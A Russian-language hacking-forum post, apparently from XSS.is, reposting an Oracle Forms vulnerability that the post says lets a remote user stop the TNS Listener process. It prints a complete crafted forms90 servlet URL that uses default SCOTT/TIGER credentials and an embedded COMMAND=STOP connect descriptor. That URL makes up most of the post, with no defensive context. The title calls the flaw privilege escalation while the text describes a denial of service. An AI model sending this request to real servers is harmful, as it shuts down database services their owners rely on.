• XSS.stack #1 – первый литературный журнал от юзеров форума

Web Oracle Forms

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
Повышение привилегий в Oracle Forms
oralogo_small.gif

Уязвимость позволяет удаленному пользователю остановить процесс TNS Listener.
Если TNS Listener защищен паролем, удаленный пользователь может с помощью специально сформированного URL остановить работу процесса. Пример:

Код:
http://[target]:8888/forms90/f90servlet?form=
test.fmx&userid=SCOTT/TIGER@(DESCRIPTION=
(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)
(HO ST=server)(PORT=1521)))(CONNECT_DATA=
(COMMAND=STOP)(SERVICE=LISTENER)))&
buffer_records=NO&debug_messages=NO&array=YES
& query_only=NO&quiet=NO&RENDER=YES

:zns2: Производтель
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх